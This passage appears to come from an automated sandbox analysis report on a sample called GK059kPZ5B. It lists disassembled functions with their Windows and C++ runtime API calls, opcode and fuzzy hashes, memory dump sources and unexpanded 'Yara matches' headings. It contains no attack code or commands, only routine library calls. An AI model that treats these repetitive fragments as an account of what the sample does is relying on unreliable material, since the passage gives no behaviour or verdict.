                                                            • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                            • String ID:
                                                            • API String ID: 3657713681-0
                                                            • Opcode ID: 9390b3195b713983fe10ad4c3c6d405898b6246382bfd66b9966ffe9dd40d037
                                                            • Instruction ID: 40b7afa646a3d714c9c7aa048d30a38f475436ec43e6df27ef76f268b119d79d
                                                            • Opcode Fuzzy Hash: 9390b3195b713983fe10ad4c3c6d405898b6246382bfd66b9966ffe9dd40d037
                                                            • Instruction Fuzzy Hash: 24F09E35E00104A3C724FB50D852C9EB3799ED1B55731851EE80713182DF31AE0EC252
                                                            APIs
                                                            • RegisterWaitForSingleObject.KERNEL32(?,00000000,004235B2,000000A4,000000FF,0000000C), ref: 00412628
                                                            • GetLastError.KERNEL32(?,?,?,?,004185E9,?,?,?,?,00000000,?,00000000), ref: 00412637
                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041264D
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0041265B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                            • String ID:
                                                            • API String ID: 3803302727-0
                                                            • Opcode ID: e4f9fab13c1926d2e81b23feee93bab4e40d19f09818ad509d0e3559ff61ead6
                                                            • Instruction ID: 0dfe4b91b17fca29e91fbe1ee06f4a4a2df34707d6a261af2a3e5670f24271a8
                                                            • Opcode Fuzzy Hash: e4f9fab13c1926d2e81b23feee93bab4e40d19f09818ad509d0e3559ff61ead6
                                                            • Instruction Fuzzy Hash: 34F0A07460010EBBCF10EFA5DE45EEF37686B00705F600656B514E20E1DA78DA149768
                                                            APIs
                                                            • RegisterWaitForSingleObject.KERNEL32(?,00000000,004235B2,000000A4,000000FF,0000000C), ref: 00A6288F
                                                            • GetLastError.KERNEL32(?,?,?,?,00A68850,?,?,?,?,00000000,?,00000000), ref: 00A6289E
                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A628B4
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A628C2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                            • String ID:
                                                            • API String ID: 3803302727-0
                                                            • Opcode ID: e4f9fab13c1926d2e81b23feee93bab4e40d19f09818ad509d0e3559ff61ead6
                                                            • Instruction ID: e224ab44bfd0bdf8c6dd6730ff63b668bf4bd0272c2e0411f690c3805ad039d8
                                                            • Opcode Fuzzy Hash: e4f9fab13c1926d2e81b23feee93bab4e40d19f09818ad509d0e3559ff61ead6
                                                            • Instruction Fuzzy Hash: 6DF0E53494020ABBCF00EFA4CE45FAF3B786B00702F600625B614E20E1DB35DA0497A4
                                                            APIs
                                                            • std::_Cnd_initX.LIBCPMT ref: 00A55AA8
                                                            • __Cnd_signal.LIBCPMT ref: 00A55AB4
                                                            • std::_Cnd_initX.LIBCPMT ref: 00A55AC9
                                                            • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00A55AD0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                            • String ID:
                                                            • API String ID: 2059591211-0
                                                            • Opcode ID: 16e91ae191353f76377487b504f8ad98fae09f0c97f906459e9bfe3258fa4ce0
                                                            • Instruction ID: 974ae79d430bd0ee4721d1618c8fef473300c4e47f36ee72ffba90d928e7dcc7
                                                            • Opcode Fuzzy Hash: 16e91ae191353f76377487b504f8ad98fae09f0c97f906459e9bfe3258fa4ce0
                                                            • Instruction Fuzzy Hash: EDF0EC32400701AFEB317770CE1775E73B0BF40326F14455CF8565A592DFB5A94C9651
                                                            APIs
                                                            • ___crtCreateEventExW.LIBCPMT ref: 0041234C
                                                            • GetLastError.KERNEL32(?,?,?,?,?,00410B59), ref: 0041235A
                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412370
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0041237E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                            • String ID:
                                                            • API String ID: 200240550-0
                                                            • Opcode ID: 8f1a4222a24bf13f64463e6bb6d09cdc0fcbd04c53ea7d81c6ce3fbd118b929d
                                                            • Instruction ID: f5537a877189a90aa28975f9b1b11099a3717870695f97e2c6136de35ce4b3b1
                                                            • Opcode Fuzzy Hash: 8f1a4222a24bf13f64463e6bb6d09cdc0fcbd04c53ea7d81c6ce3fbd118b929d
                                                            • Instruction Fuzzy Hash: ADE0D871A0021E29E720B7768D07FBF369C6B00B45F54086BBD14E11C3FDACD61041AC
                                                            APIs
                                                            • ___crtCreateEventExW.LIBCPMT ref: 00A625B3
                                                            • GetLastError.KERNEL32(?,?,?,?,?,00A60DC0), ref: 00A625C1
                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A625D7
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A625E5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                            • String ID:
                                                            • API String ID: 200240550-0
                                                            • Opcode ID: 8f1a4222a24bf13f64463e6bb6d09cdc0fcbd04c53ea7d81c6ce3fbd118b929d
                                                            • Instruction ID: fd1acea733a1922d2d317b026e998787437bfdebd26b05bba027b98c10fb5f70
                                                            • Opcode Fuzzy Hash: 8f1a4222a24bf13f64463e6bb6d09cdc0fcbd04c53ea7d81c6ce3fbd118b929d
                                                            • Instruction Fuzzy Hash: 7AE04F61A402192AE720B7758D17FBB36AC9B00B42F984865FE1AE50C3FDA9D50446A9
                                                            APIs
                                                              • Part of subcall function 00412712: TlsAlloc.KERNEL32(?,00410B59), ref: 00412718
                                                            • TlsAlloc.KERNEL32(?,00410B59), ref: 0042399F
                                                            • GetLastError.KERNEL32 ref: 004239B1
                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004239C7
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004239D5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                            • String ID:
                                                            • API String ID: 3735082963-0
                                                            • Opcode ID: 90a75019d660bb7e4688d3e898997b6e923421556ddb8c6bd1ae311c324a1122
                                                            • Instruction ID: 6dd5cecd5731d0fd3396096e4a73a475127880a88571f9a1564212530dcc10d0
                                                            • Opcode Fuzzy Hash: 90a75019d660bb7e4688d3e898997b6e923421556ddb8c6bd1ae311c324a1122
                                                            • Instruction Fuzzy Hash: C9E02BF45003245EC310BF72AD4A66F3274790170AB600E2BF015D2192EEBCD1844A9C
                                                            APIs
                                                              • Part of subcall function 00A62979: TlsAlloc.KERNEL32(?,00A60DC0), ref: 00A6297F
                                                            • TlsAlloc.KERNEL32(?,00A60DC0), ref: 00A73C06
                                                            • GetLastError.KERNEL32 ref: 00A73C18
                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A73C2E
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A73C3C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                            • String ID:
                                                            • API String ID: 3735082963-0
                                                            • Opcode ID: 90a75019d660bb7e4688d3e898997b6e923421556ddb8c6bd1ae311c324a1122
                                                            • Instruction ID: f94964d792d964270a1db307679df64f113ca9d07aa36faa214ca60ac7795dfd
                                                            • Opcode Fuzzy Hash: 90a75019d660bb7e4688d3e898997b6e923421556ddb8c6bd1ae311c324a1122
                                                            • Instruction Fuzzy Hash: 95E061744003116FC700BB705D4A67A36746600342B10CE36F119D20A2ED34D248575D
                                                            APIs
                                                            • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B59), ref: 00412557
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B59), ref: 00412566
                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041257C
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0041258A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                            • String ID:
                                                            • API String ID: 3016159387-0
                                                            • Opcode ID: 90c6f96075c9eb6d4a06c4afc3ce6f74b9e2c23d697b5ba2851b3fb9f8cfd27c
                                                            • Instruction ID: 951ac86653187ea2db5183bbef748415e33b6f8be8890effbe132357fd44ea8b
                                                            • Opcode Fuzzy Hash: 90c6f96075c9eb6d4a06c4afc3ce6f74b9e2c23d697b5ba2851b3fb9f8cfd27c
                                                            • Instruction Fuzzy Hash: 69E04874A0010DABC714EFB5DF49AEF73BC7A00A45FA00466A501E2151EA6CDB04977D
                                                            APIs
                                                            • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00A60DC0), ref: 00A627BE
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00A60DC0), ref: 00A627CD
                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A627E3
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A627F1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                            • String ID:
                                                            • API String ID: 3016159387-0
                                                            • Opcode ID: 90c6f96075c9eb6d4a06c4afc3ce6f74b9e2c23d697b5ba2851b3fb9f8cfd27c
                                                            • Instruction ID: 4672f92e92b4ee33605e6b71219e08b5669b134fcfec3a63c26c9b239c5fb802
                                                            • Opcode Fuzzy Hash: 90c6f96075c9eb6d4a06c4afc3ce6f74b9e2c23d697b5ba2851b3fb9f8cfd27c
                                                            • Instruction Fuzzy Hash: 5AE0807464010DA7C700FBB5DD49FAF77BC6A00B46B600865B505E3051DB68DB048779
                                                            APIs
                                                            • SetThreadPriority.KERNEL32(?,?), ref: 004126B1
                                                            • GetLastError.KERNEL32 ref: 004126BD
                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126D3
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004126E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                            • String ID:
                                                            • API String ID: 4286982218-0
                                                            • Opcode ID: a89e8ca6049c9b6ec2fd05d368a3b84ec4fd3d7342a975297e58808702deda3e
                                                            • Instruction ID: d6ad487b4c18070c6cf6a1f44c15ecb3f6d05e9c3d6252d545de6a15e1df0045
                                                            • Opcode Fuzzy Hash: a89e8ca6049c9b6ec2fd05d368a3b84ec4fd3d7342a975297e58808702deda3e
                                                            • Instruction Fuzzy Hash: BBE086746001196BCB24BF61DE06BFF376C7B00745F50082BB515D50A1EF7DD56486AC
                                                            APIs
                                                            • TlsSetValue.KERNEL32(?,00000000,00417991,00000000,?,?,00410B59,?,?,?,00000000,?,00000000), ref: 00412777
                                                            • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412783
                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412799
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004127A7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                            • String ID:
                                                            • API String ID: 1964976909-0
                                                            • Opcode ID: aac3effd464d41b8a5b5f51f1256ba0c29368646bc02732cdbcc67f1fe2b72fc
                                                            • Instruction ID: 402fe0f5bbe0f151a29ab6283833ac733f3ad497baf8671b47c41dc8f6c9e06d
                                                            • Opcode Fuzzy Hash: aac3effd464d41b8a5b5f51f1256ba0c29368646bc02732cdbcc67f1fe2b72fc
                                                            • Instruction Fuzzy Hash: F7E086746001196BDB20BF65DE09BFF37AC7F00745F50082AB515D50A1EE7DD564869C
                                                            APIs
                                                            • TlsSetValue.KERNEL32(?,00000000,00A67BF8,00000000,?,?,00A60DC0,?,?,?,00000000,?,00000000), ref: 00A629DE
                                                            • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00A629EA
                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A62A00
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A62A0E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                            • String ID:
                                                            • API String ID: 1964976909-0
                                                            • Opcode ID: aac3effd464d41b8a5b5f51f1256ba0c29368646bc02732cdbcc67f1fe2b72fc
                                                            • Instruction ID: e960e45dec4df997fb95ff5652ed89341ba47fd33a6897f17a582c9d509a475b
                                                            • Opcode Fuzzy Hash: aac3effd464d41b8a5b5f51f1256ba0c29368646bc02732cdbcc67f1fe2b72fc
                                                            • Instruction Fuzzy Hash: 54E0863550011967DB10BF64CD0ABBB377C6F00B42F504925B959D10A1DE39D5149799
                                                            APIs
                                                            • SetThreadPriority.KERNEL32(?,?), ref: 00A62918
                                                            • GetLastError.KERNEL32 ref: 00A62924
                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A6293A
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A62948
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                            • String ID:
                                                            • API String ID: 4286982218-0
                                                            • Opcode ID: a89e8ca6049c9b6ec2fd05d368a3b84ec4fd3d7342a975297e58808702deda3e
                                                            • Instruction ID: 6d974c292d61b0d2f6ae0ba07e6fa8050ab79a1fb123a889e287c1e075d51ca8
                                                            • Opcode Fuzzy Hash: a89e8ca6049c9b6ec2fd05d368a3b84ec4fd3d7342a975297e58808702deda3e
                                                            • Instruction Fuzzy Hash: FEE0863550011A67CB14BF60CD0ABBB37BC6B00742F504825B519D10A1EE39D504875C
                                                            APIs
                                                            • TlsAlloc.KERNEL32(?,00410B59), ref: 00412718
                                                            • GetLastError.KERNEL32 ref: 00412725
                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041273B
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00412749
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                            • String ID:
                                                            • API String ID: 3103352999-0
                                                            • Opcode ID: ee2646b63a6430665b3080167d3f8e46aee4a193fb16d21d2dbfdc4c253f15bc
                                                            • Instruction ID: 41d26ccb9910f396398e3bce7d3f30876e3ac6ee5b10193dd838f65c512c27a9
                                                            • Opcode Fuzzy Hash: ee2646b63a6430665b3080167d3f8e46aee4a193fb16d21d2dbfdc4c253f15bc
                                                            • Instruction Fuzzy Hash: F8E0C274500119678728BB759E0AABF73687A01759BA00A6BF031D20E1EEACD45842AC
                                                            APIs
                                                            • TlsAlloc.KERNEL32(?,00A60DC0), ref: 00A6297F
                                                            • GetLastError.KERNEL32 ref: 00A6298C
                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A629A2
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A629B0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                            • String ID:
                                                            • API String ID: 3103352999-0
                                                            • Opcode ID: ee2646b63a6430665b3080167d3f8e46aee4a193fb16d21d2dbfdc4c253f15bc
                                                            • Instruction ID: 8fa92e54238e6894d45e976f144724655289ed13e57df925fe4b55ec0618ecd4
                                                            • Opcode Fuzzy Hash: ee2646b63a6430665b3080167d3f8e46aee4a193fb16d21d2dbfdc4c253f15bc
                                                            • Instruction Fuzzy Hash: 52E0C23444051567C714BB749C4AB7B72786A01762FA40F26F065D20E1EA68D40843A9
                                                            APIs
                                                            • __startOneArgErrorHandling.LIBCMT ref: 0042F12D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ErrorHandling__start
                                                            • String ID: pow
                                                            • API String ID: 3213639722-2276729525
                                                            • Opcode ID: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                            • Instruction ID: ab4d94818e4fdfc694d7abd88a5ac0d422e49d456205366947d10b0b41845edd
                                                            • Opcode Fuzzy Hash: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                            • Instruction Fuzzy Hash: CA518D61B04202D6CB117714E90137BABB0EB54B10FE4597FF491463A9EE2E8CA99A4F
                                                            APIs
                                                            • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0E4,?,00000050,?,?,?,?,?), ref: 0043AF64
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ACP$OCP
                                                            • API String ID: 0-711371036
                                                            • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                            • Instruction ID: 994420f7c07a265647d1fb29ceaf4862ceaaa8a779cd6f75aafce353e6124497
                                                            • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                            • Instruction Fuzzy Hash: 122108A2BC0101A6EB30DB14C90279B7266EF6CB10F569527E98AD7340E73ADD11C35E
                                                            APIs
                                                            • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00A8B34B,?,00000050,?,?,?,?,?), ref: 00A8B1CB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ACP$OCP
                                                            • API String ID: 0-711371036
                                                            • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                            • Instruction ID: 1d43618148b4c5b332800effe841fde8a3de93af3aae343094e078a2840e0dfb
                                                            • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                            • Instruction Fuzzy Hash: 6621C572B60105A6EB24EF648D29B9773AAEF54B50F568624ED09DF200F732DD40C3B0
                                                            APIs
                                                            • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F41
                                                            • GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F66
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: EncodersGdipImage$Size
                                                            • String ID: image/png
                                                            • API String ID: 864223233-2966254431
                                                            • Opcode ID: 896ca310b2d930f63a5eabfafad02fd990c57be0705be7f150b4b226794c9691
                                                            • Instruction ID: 499c26c8a42b7bd5ccc1bf70bc14c74cf5c012d897e463d4ef063c4de499c351
                                                            • Opcode Fuzzy Hash: 896ca310b2d930f63a5eabfafad02fd990c57be0705be7f150b4b226794c9691
                                                            • Instruction Fuzzy Hash: 73119176D0410ABFCB019FA9988189EBB76EE41321B60027BE810B32A0C7795E559A58
                                                            APIs
                                                            • SetLastError.KERNEL32(0000000D,?,00A5E0CD,00A5C8E5,?,?,00000000,?,00A5C7B5,0045D5E4,0040C51B,0045D5DC,?,ios_base::failbit set,00A5C8E5), ref: 00A5F236
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast
                                                            • String ID: 11@
                                                            • API String ID: 1452528299-1785270423
                                                            • Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                            • Instruction ID: e270781544280a79691f188b770301e166baa5e22b00ebf2cc02aab7acf850ac
                                                            • Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                            • Instruction Fuzzy Hash: 98118E7A200226AFCF165F64DC489AEBB69FB09B16F104038FE15D6250DA709818DBA0
                                                            APIs
                                                              • Part of subcall function 00A60F85: RtlEnterCriticalSection.NTDLL ref: 00A60F86
                                                            • List.LIBCONCRT ref: 00A6DBCF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalEnterListSection
                                                            • String ID: +$D$11@
                                                            • API String ID: 2909958271-3688954461
                                                            • Opcode ID: 202ad810f09b455ae9d35922495593e33a197e3d39888fc6707643b4f93c0e82
                                                            • Instruction ID: f7808640ab2bf069c674a98dda1ad071a6151c40b940f67af17a5b88fcc9f759
                                                            • Opcode Fuzzy Hash: 202ad810f09b455ae9d35922495593e33a197e3d39888fc6707643b4f93c0e82
                                                            • Instruction Fuzzy Hash: 0C212C75A00219CFCF04EF68C581AAEB7B1FF48310B158469E906AB352CB70EE45CF90
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: SpinWait
                                                            • String ID: 11@
                                                            • API String ID: 2810355486-1785270423
                                                            • Opcode ID: 29a75abf41ee9a1be823ea049822ab3759e986b0ee5abe1ab6e190251c7ebecc
                                                            • Instruction ID: 2c89d4891b65b71c58f4df53b819bdc9dd2f83fb67093c95cbfc0296fa784990
                                                            • Opcode Fuzzy Hash: 29a75abf41ee9a1be823ea049822ab3759e986b0ee5abe1ab6e190251c7ebecc
                                                            • Instruction Fuzzy Hash: 2001B5315147228FCA355F3AE5197ABBBD1EB01721B14892FE05683764C6E9DCC2CB88
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: SpinWait
                                                            • String ID: 11@
                                                            • API String ID: 2810355486-1785270423
                                                            • Opcode ID: 29a75abf41ee9a1be823ea049822ab3759e986b0ee5abe1ab6e190251c7ebecc
                                                            • Instruction ID: 9dcefb18ab1c388930c8e6bbff61ed71a85f0a4a7d56227f544fda6aaf134e50
                                                            • Opcode Fuzzy Hash: 29a75abf41ee9a1be823ea049822ab3759e986b0ee5abe1ab6e190251c7ebecc
                                                            • Instruction Fuzzy Hash: B50184319506229FCB259F39D91876ABFF0FB13721F1C862DD15683A64CA61EC80CB80
                                                            APIs
                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,23E85006,00000001,?,?), ref: 00435451
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
